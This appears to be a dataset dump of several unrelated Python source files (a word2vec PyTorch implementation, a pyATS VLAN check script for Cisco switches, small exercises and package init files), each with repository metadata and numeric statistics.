| 28 | 49 | 0.885714 | 15 | 140 | 8.266667 | 0.666667 | 0.306452 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007874 | 0.092857 | 140 | 4 | 50 | 35 | 0.968504 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
48872fe4781cd9390193bf064238c14849d958e6 | 43 | py | Python | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
] | null | null | null | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
] | null | null | null | codingbat.com/List-1/sum2.py | ahmedelq/PythonicAlgorithms | ce10dbb6e1fd0ea5c922a932b0f920236aa411bf | [
"MIT"
] | null | null | null | def sum2(nums):
return sum(nums[:2])
| 14.333333 | 26 | 0.581395 | 7 | 43 | 3.571429 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.060606 | 0.232558 | 43 | 2 | 27 | 21.5 | 0.69697 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
6f8a772fde9e0b478f79cd961bf619408c48f411 | 11,424 | py | Python | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | lib/word2vec_utils/word2vec_utils/word2vec_utils.py | simonefu/Word_Embeddings | 23333aaeeba8664e080943c7898f2149dcca3fec | [
"MIT"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import urllib.request
from nltk.tokenize import RegexpTokenizer
from nltk.corpus import stopwords
from nltk import word_tokenize
import sklearn
from sklearn.cluster import KMeans
from sklearn.metrics.pairwise import euclidean_distances
class CBOW_model(nn.Module):
"""
The class compute words embeddings using the CBOW architecture
...
Attributes
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
inputs : list
is the list of indices associated with the words (id2words)
Methods
-------
forward(self, inputs)
describe the forward computation of the architecture
predict(self, input)
"""
def __init__(self, vocab_size, embedding_dim, context_size):
"""
Parameters
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
"""
super(CBOW_model, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.linear1 = nn.Linear(context_size * embedding_dim, 128)
self.linear2 = nn.Linear(128, vocab_size)
def forward(self, inputs):
"""Compute the probabilities for each word of the vocabulary
Parameters
----------
inputs : list
is the list of indices associated with the words (id2words)
Raises
------
NotImplementedError
If no words is init it raises error
"""
embeds = self.embeddings(inputs).view((1, -1)) # -1 implies size inferred for that index from the size of the data
out1 = F.relu(self.linear1(embeds)) # output of first layer
out2 = self.linear2(out1) # output of second layer
log_probs = F.log_softmax(out2, dim=1)
return log_probs
def predict(self,input):
"""get the word with the higher probability
Parameters
----------
inputs : torch.tensor
the tensor containing the probability for each word of the vocabulary
"""
context_idxs = torch.tensor([word_to_ix[w] for w in input], dtype = torch.long)
res = self.forward(context_idxs)
res_arg = torch.argmax(res)
res_val, res_ind = res.sort(descending=True)
res_val = res_val[0][:3]
res_ind = res_ind[0][:3]
#print(res_val)
#print(res_ind)
for arg in zip(res_val,res_ind):
#print(arg)
print([(key,val,arg[0]) for key,val in word_to_ix.items() if val == arg[1]])
class Skipgram_model(nn.Module):
"""
The class compute words embeddings using the Skipgram architecture
...
Attributes
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
inputs : list
is the list of indices associated with the words (id2words)
Methods
-------
forward(self, inputs)
describe the forward computation of the architecture
predict(self, input)
"""
def __init__(self, vocab_size, embedding_dim, context_size):
"""
Parameters
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
"""
super(Skipgram_model, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.linear1 = nn.Linear(embedding_dim, 128)
self.linear2 = nn.Linear(128, context_size * vocab_size)
def forward(self, inputs):
"""Compute the probabilities for each word of the vocabulary
Parameters
----------
inputs : list
is the list of indices associated with the words (id2words)
Raises
------
NotImplementedError
If no words is init it raises error
"""
embeds = self.embeddings(inputs).view((1, -1)) # -1 implies size inferred for that index from the size of the data
out1 = F.relu(self.linear1(embeds)) # output of first layer
out2 = self.linear2(out1) # output of second layer
log_probs = F.log_softmax(out2, dim=1).view(CONTEXT_SIZE,-1)
return log_probs
def predict(self,input):
"""get the word with the higher probability
Parameters
----------
inputs : torch.tensor
the tensor containing the probability for each word of the vocabulary
"""
context_idxs = torch.tensor([word_to_ix[input]], dtype=torch.long)
res = self.forward(context_idxs)
res_arg = torch.argmax(res)
res_val, res_ind = res.sort(descending=True)
indices = [res_ind[i][0] for i in np.arange(0,3)]
for arg in indices:
print( [ (key, val) for key,val in word_to_ix.items() if val == arg ])
def get_key(word_id):
"""get the word corresponfing to the id map
Parameters
----------
word_id : int
the word id corresponding to the word of the vocabulary
Returns
-------
word
the corresponding word
"""
for key,val in word_to_ix.items():
if(val == word_id):
print(key)
def cluster_embeddings(filename,nclusters):
"""compute the most similar word
Parameters
----------
filename : str
the word id corresponding to the word of the vocabulary
nclusters: int
the number of clusters
Returns
-------
word
the corresponding word
"""
X = np.load(filename)
kmeans = KMeans(n_clusters=nclusters, random_state=0).fit(X)
center = kmeans.cluster_centers_
distances = euclidean_distances(X,center)
for i in np.arange(0,distances.shape[1]):
word_id = np.argmin(distances[:,i])
print(word_id)
get_key(word_id)
def read_data(file_path):
""" Read and process the text file by removing stopwords
Parameters
----------
file_path : str
the path where the input text file is stored
Returns
-------
str
the preprocessed text file
"""
tokenizer = RegexpTokenizer(r'\w+')
data = urllib.request.urlopen(file_path)
data = data.read().decode('utf8')
tokenized_data = word_tokenize(data)
stop_words = set(stopwords.words('english'))
stop_words.update(['.',',',':',';','(',')','#','--','...','"'])
cleaned_words = [ i for i in tokenized_data if i not in stop_words ]
return(cleaned_words)
class CBOWModeler(nn.Module):
"""
The class compute words embeddings using the CBOW architecture
...
Attributes
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
inputs : list
is the list of indices associated with the words (id2words)
Methods
-------
forward(self, inputs)
describe the forward computation of the architecture
predict(self, input)
"""
def __init__(self, vocab_size, embedding_dim, context_size):
"""
Parameters
----------
vocab_size : int
maximum number of vocabulary size
embedding_dim : int
dimension of the word embeddings vector space
context_size : int
the range distance of the words that we need to predict the target word
"""
super(CBOWModeler, self).__init__()
self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.linear1 = nn.Linear(context_size * embedding_dim, 128)
self.linear2 = nn.Linear(128, vocab_size)
def forward(self, inputs):
"""Compute the probabilities for each word of the vocabulary
Parameters
----------
inputs : list
is the list of indices associated with the words (id2words)
Raises
------
NotImplementedError
If no words is init it raises error
"""
#from IPython.core.debugger import Tracer; Tracer()()
embeds = self.embeddings(inputs).view((1, -1)) # -1 implies size inferred for that index from the size of the data
#print(np.mean(np.mean(self.linear2.weight.data.numpy())))
out1 = F.relu(self.linear1(embeds)) # output of first layer
out2 = self.linear2(out1) # output of second layer
#print(embeds)
log_probs = F.log_softmax(out2, dim=1)
return log_probs
def predict(self,input):
"""get the word with the higher probability
Parameters
----------
inputs : torch.tensor
the tensor containing the probability for each word of the vocabulary
"""
context_idxs = torch.tensor([word_to_ix[w] for w in input], dtype=torch.long)
res = self.forward(context_idxs)
res_arg = torch.argmax(res)
res_val, res_ind = res.sort(descending=True)
res_val = res_val[0][:3]
res_ind = res_ind[0][:3]
#print(res_val)
#print(res_ind)
for arg in zip(res_val,res_ind):
#print(arg)
print([(key,val,arg[0]) for key,val in word_to_ix.items() if val == arg[1]])
def freeze_layer(self,layer):
"""it does not upgrade the weights of the layer
Parameters
----------
layer : str
the corresponding layer to freeze
"""
for name,child in model.named_children():
print(name,child)
if(name == layer):
for names,params in child.named_parameters():
print(names,params)
print(params.size())
params.requires_grad= False
def print_layer_parameters(self):
for name,child in model.named_children():
print(name,child)
for names,params in child.named_parameters():
print(names,params)
print(params.size())
def write_embedding_to_file(self,filename):
for i in self.embeddings.parameters():
weights = i.data.numpy()
np.save(filename,weights)
return weights
| 32.180282 | 123 | 0.584996 | 1,380 | 11,424 | 4.723188 | 0.144203 | 0.020712 | 0.034366 | 0.02332 | 0.759742 | 0.75023 | 0.745627 | 0.745627 | 0.739951 | 0.739951 | 0 | 0.01046 | 0.322129 | 11,424 | 354 | 124 | 32.271186 | 0.831224 | 0 | 0 | 0.513043 | 0 | 0 | 0.005079 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.104348 | null | null | 0.104348 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6f90680823c6fe76b63921ed79900d53a7ee49a2 | 149 | py | Python | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | null | null | null | itmo/2014-15/final/store.py | dluschan/olymp | dfbf4352dbc7f6fd7563e7bd19aff6fd67fb50b7 | [
"MIT"
] | 1 | 2018-09-14T18:50:48.000Z | 2018-09-14T18:50:48.000Z | import math
for i in range(1, 100):
print(i, math.ceil(math.log(i*10000000+2563218)/math.log(2)) - math.ceil(math.log(i*256*32*18)/math.log(2)))
| 37.25 | 112 | 0.677852 | 31 | 149 | 3.258065 | 0.548387 | 0.277228 | 0.237624 | 0.29703 | 0.316832 | 0 | 0 | 0 | 0 | 0 | 0 | 0.208955 | 0.100671 | 149 | 3 | 113 | 49.666667 | 0.544776 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0.333333 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
6f9730618ab89bf474db4ed001fc34c303c7a73b | 121 | py | Python | mlfinlab/filters/__init__.py | rooster1979/mlfin | cc7efe071713ae522fc21519dc344e39b718c6f6 | [
"MIT"
] | 5 | 2020-05-04T15:26:08.000Z | 2021-07-18T00:07:05.000Z | mlfinlab/filters/__init__.py | anirbanghoshsbi/mlfinlab | 3a6381d47fb50d86ce657f184490f012adf6fb37 | [
"BSD-3-Clause"
] | 1 | 2020-03-19T15:07:58.000Z | 2020-03-19T15:07:58.000Z | mlfinlab/filters/__init__.py | anirbanghoshsbi/mlfinlab | 3a6381d47fb50d86ce657f184490f012adf6fb37 | [
"BSD-3-Clause"
] | 2 | 2020-01-20T04:22:05.000Z | 2020-04-05T14:42:32.000Z | """
Logic regarding the various types of filters:
* CUSUM Filter
"""
from mlfinlab.filters.filters import cusum_filter
| 15.125 | 49 | 0.768595 | 16 | 121 | 5.75 | 0.75 | 0.23913 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.14876 | 121 | 7 | 50 | 17.285714 | 0.893204 | 0.504132 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6f9dbb038e6121782463a4c34d34ed88a5d4d1fe | 14,135 | py | Python | RobotFramework/inventories/production/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 36 | 2019-07-17T17:00:32.000Z | 2022-03-26T09:34:40.000Z | RobotFramework/ex4/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 4 | 2021-03-31T19:16:53.000Z | 2021-12-13T20:01:57.000Z | RobotFramework/inventories/development/vlans_check.py | dmmar/netascode | 1d15e717b600d38bd33a65fa110e1c129d72e5df | [
"MIT"
] | 10 | 2019-07-31T07:58:03.000Z | 2021-10-13T04:45:45.000Z | # Example
# -------
#
# vlans_check.py
from pyats import aetest
import logging
import textfsm
from pyats.log.utils import banner
# TextFSM template for cisco_ios_show_vlan
template = open('cisco_ios_show_vlan.template')
# Compare these vlans [lists] with output from device (# show vlan br)
vlan10 = ['10', 'Sales', 'active']
vlan20 = ['20', 'Managers', 'active']
vlan30 = ['30', 'Developers', 'active']
vlan40 = ['40', 'Accounting', 'active']
# get your logger for your script
logger = logging.getLogger(__name__)
class CommonSetup(aetest.CommonSetup):
# CommonSetup-SubSec1
@aetest.subsection
def check_topology(
self,
testbed,
HQ_DIS1_name = 'HQ-DIS1',
HQ_DIS2_name = 'HQ-DIS2',
HQ_AC1_name = 'HQ-AC1',
HQ_AC2_name = 'HQ-AC2',
HQ_AC3_name = 'HQ-AC3',
HQ_AC4_name = 'HQ-AC4'):
HQ_DIS1 = testbed.devices[HQ_DIS1_name]
HQ_DIS2 = testbed.devices[HQ_DIS2_name]
HQ_AC1 = testbed.devices[HQ_AC1_name]
HQ_AC2 = testbed.devices[HQ_AC2_name]
HQ_AC3 = testbed.devices[HQ_AC3_name]
HQ_AC4 = testbed.devices[HQ_AC4_name]
# add them to testscript parameters
self.parent.parameters.update(
HQ_DIS1 = HQ_DIS1,
HQ_DIS2 = HQ_DIS2,
HQ_AC1 = HQ_AC1,
HQ_AC2 = HQ_AC2,
HQ_AC3 = HQ_AC3,
HQ_AC4 = HQ_AC4)
# CommonSetup-SubSec
@aetest.subsection
def establish_connections(self, steps, HQ_DIS1, HQ_DIS2, HQ_AC1, HQ_AC2, HQ_AC3, HQ_AC4):
with steps.start('Connecting to %s' % HQ_DIS1.name):
HQ_DIS1.connect()
with steps.start('Connecting to %s' % HQ_DIS2.name):
HQ_DIS2.connect()
with steps.start('Connecting to %s' % HQ_AC1.name):
HQ_AC1.connect()
with steps.start('Connecting to %s' % HQ_AC2.name):
HQ_AC2.connect()
with steps.start('Connecting to %s' % HQ_AC3.name):
HQ_AC3.connect()
with steps.start('Connecting to %s' % HQ_AC4.name):
HQ_AC4.connect()
# TestCases
class TESTCASE_1(aetest.Testcase):
@aetest.test
def HQ_DIS1_SHOW_VLAN_BRIEF_CHECK(self, HQ_DIS1):
try:
# store execution result for later usage
result = HQ_DIS1.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
vlan10_output = parsed_results[1]
vlan10_output.pop()
vlan20_output = parsed_results[2]
vlan20_output.pop()
vlan30_output = parsed_results[3]
vlan30_output.pop()
vlan40_output = parsed_results[4]
vlan40_output.pop()
if vlan10_output == vlan10:
print('VLAN-10 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
self.failed()
if vlan20_output == vlan20:
print('VLAN-20 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
self.failed()
if vlan30_output == vlan30:
print('VLAN-30 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
self.failed()
if vlan40_output == vlan40:
print('VLAN-40 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto=['exit'])
else:
print('ALL VLANS EXISTS')
@aetest.test
def HQ_DIS2_SHOW_VLAN_BRIEF_CHECK(self, HQ_DIS2):
try:
# store execution result for later usage
result = HQ_DIS2.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
vlan10_output = parsed_results[1]
vlan10_output.pop()
vlan20_output = parsed_results[2]
vlan20_output.pop()
vlan30_output = parsed_results[3]
vlan30_output.pop()
vlan40_output = parsed_results[4]
vlan40_output.pop()
if vlan10_output == vlan10:
print('VLAN-10 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
self.failed()
if vlan20_output == vlan20:
print('VLAN-20 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
self.failed()
if vlan30_output == vlan30:
print('VLAN-30 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
self.failed()
if vlan40_output == vlan40:
print('VLAN-40 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto=['exit'])
else:
print('ALL VLANS EXISTS')
@aetest.test
def HQ_AC1_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC1):
try:
# store execution result for later usage
result = HQ_AC1.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
vlan10_output = parsed_results[1]
vlan10_output.pop()
# vlan20_output = parsed_results[2]
# vlan20_output.pop()
# vlan30_output = parsed_results[3]
# vlan30_output.pop()
# vlan40_output = parsed_results[4]
# vlan40_output.pop()
if vlan10_output == vlan10:
print('VLAN-10 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
self.failed()
# if vlan20_output == vlan20:
# print('VLAN-20 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan30_output == vlan30:
# print('VLAN-30 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan40_output == vlan40:
# print('VLAN-40 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
# self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto = ['exit'])
else:
print('ALL VLANS EXISTS')
@aetest.test
def HQ_AC2_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC2):
try:
# store execution result for later usage
result = HQ_AC2.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
# vlan10_output = parsed_results[1]
# vlan10_output.pop()
vlan20_output = parsed_results[1]
vlan20_output.pop()
# vlan30_output = parsed_results[3]
# vlan30_output.pop()
# vlan40_output = parsed_results[4]
# vlan40_output.pop()
# if vlan10_output == vlan10:
# print('VLAN-10 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
# self.failed()
if vlan20_output == vlan20:
print('VLAN-20 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
self.failed()
# if vlan30_output == vlan30:
# print('VLAN-30 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan40_output == vlan40:
# print('VLAN-40 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
# self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto=['exit'])
else:
print('ALL VLANS EXISTS')
@aetest.test
def HQ_AC3_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC3):
try:
# store execution result for later usage
result = HQ_AC3.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
# vlan10_output = parsed_results[1]
# vlan10_output.pop()
# vlan20_output = parsed_results[2]
# vlan20_output.pop()
vlan30_output = parsed_results[1]
vlan30_output.pop()
# vlan40_output = parsed_results[4]
# vlan40_output.pop()
# if vlan10_output == vlan10:
# print('VLAN-10 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan20_output == vlan20:
# print('VLAN-20 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
# self.failed()
if vlan30_output == vlan30:
print('VLAN-30 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
self.failed()
# if vlan40_output == vlan40:
# print('VLAN-40 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
# self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto=['exit'])
else:
print('ALL VLANS EXISTS')
@aetest.test
def HQ_AC4_SHOW_VLAN_BRIEF_CHECK(self, HQ_AC4):
try:
# store execution result for later usage
result = HQ_AC4.execute('show vlan brief')
results_template = textfsm.TextFSM(template)
parsed_results = results_template.ParseText(result)
# Will delete information about interfaces from the list
# vlan10_output = parsed_results[1]
# vlan10_output.pop()
# vlan20_output = parsed_results[2]
# vlan20_output.pop()
# vlan30_output = parsed_results[3]
# vlan30_output.pop()
vlan40_output = parsed_results[1]
vlan40_output.pop()
# if vlan10_output == vlan10:
# print('VLAN-10 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-10 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan20_output == vlan20:
# print('VLAN-20 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-20 - [DOES NOT EXIST]'))
# self.failed()
#
# if vlan30_output == vlan30:
# print('VLAN-30 - [EXISTS and ACTIVE]')
# else:
# logger.info(banner('VLAN-30 - [DOES NOT EXIST]'))
# self.failed()
if vlan40_output == vlan40:
print('VLAN-40 - [EXISTS and ACTIVE]')
else:
logger.info(banner('VLAN-40 - [DOES NOT EXIST]'))
self.failed()
except Exception as e:
self.failed('Device {} \'show vlan brief\' failed: '
'{}'.format(HQ_AC1, str(e)),
goto=['exit'])
else:
print('ALL VLANS EXISTS')
# CommonCleanup
class CommonCleanup(aetest.CommonCleanup):
@aetest.subsection
def disconnect(self, steps, HQ_DIS1, HQ_DIS2, HQ_AC1, HQ_AC2, HQ_AC3, HQ_AC4):
with steps.start('Disconnecting from %s' % HQ_DIS1.name):
HQ_DIS1.disconnect()
with steps.start('Disconnecting from %s' % HQ_DIS2.name):
HQ_DIS2.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC1.name):
HQ_AC1.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC2.name):
HQ_AC2.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC3.name):
HQ_AC3.disconnect()
with steps.start('Disconnecting from %s' % HQ_AC4.name):
HQ_AC4.disconnect()
if __name__ == '__main__':
import argparse
from pyats.topology import loader
parser = argparse.ArgumentParser()
parser.add_argument('--testbed', dest = 'testbed',
type = loader.load)
args, unknown = parser.parse_known_args()
aetest.main(**vars(args)) | 34.72973 | 93 | 0.525999 | 1,517 | 14,135 | 4.726434 | 0.091628 | 0.054393 | 0.063598 | 0.063598 | 0.847141 | 0.821897 | 0.780614 | 0.775732 | 0.719944 | 0.683124 | 0 | 0.047281 | 0.362575 | 14,135 | 407 | 94 | 34.72973 | 0.748502 | 0.231341 | 0 | 0.631579 | 0 | 0 | 0.128279 | 0.002605 | 0 | 0 | 0 | 0 | 0 | 1 | 0.039474 | false | 0 | 0.026316 | 0 | 0.078947 | 0.078947 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6fa21615bf689fb1c47e48a0fb4bde9df1fc91c1 | 123 | py | Python | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 141 | 2016-02-17T14:27:57.000Z | 2021-12-27T02:56:48.000Z | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 69 | 2016-02-20T02:06:59.000Z | 2017-01-29T22:23:46.000Z | cosrlib/document/html/__init__.py | commonsearch/cosr-back | 28ca0c1b938dde52bf4f59a835c98dd5ab22cad6 | [
"Apache-2.0"
] | 38 | 2016-02-25T04:40:07.000Z | 2020-06-11T07:22:44.000Z | from __future__ import absolute_import, division, print_function, unicode_literals
from .htmldocument import HTMLDocument
| 30.75 | 82 | 0.869919 | 14 | 123 | 7.142857 | 0.714286 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 123 | 3 | 83 | 41 | 0.900901 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | 6 |
6fb902de41240143ed7fba6dbd3ce91040aca3f9 | 26 | py | Python | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | null | null | null | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | null | null | null | terrascript/spotinst/__init__.py | GarnerCorp/python-terrascript | ec6c2d9114dcd3cb955dd46069f8ba487e320a8c | [
"BSD-2-Clause"
] | 1 | 2018-11-15T16:23:05.000Z | 2018-11-15T16:23:05.000Z | """2019-05-28 10:50:37"""
| 13 | 25 | 0.538462 | 6 | 26 | 2.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.583333 | 0.076923 | 26 | 1 | 26 | 26 | 0 | 0.730769 | 0 | null | 0 | null | 0 | 0 | null | 0 | 0 | 0 | null | 1 | null | true | 0 | 0 | null | null | null | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6fde74220f54a551d0c63336186fcd91dd9e1e9c | 160 | py | Python | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 176 | 2015-07-31T23:33:37.000Z | 2022-03-21T23:42:44.000Z | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 1,276 | 2015-05-03T01:21:27.000Z | 2022-03-31T15:32:20.000Z | python/kwiver/sprokit/__init__.py | mwoehlke-kitware/kwiver | 614a488bd2b7fe551ac75eec979766d882709791 | [
"BSD-3-Clause"
] | 85 | 2015-01-25T05:13:38.000Z | 2022-01-14T14:59:37.000Z | # -*- coding: utf-8 -*-
"""
The base SPROKIT package initialization
"""
# flake8: noqa
from __future__ import print_function, unicode_literals, absolute_import
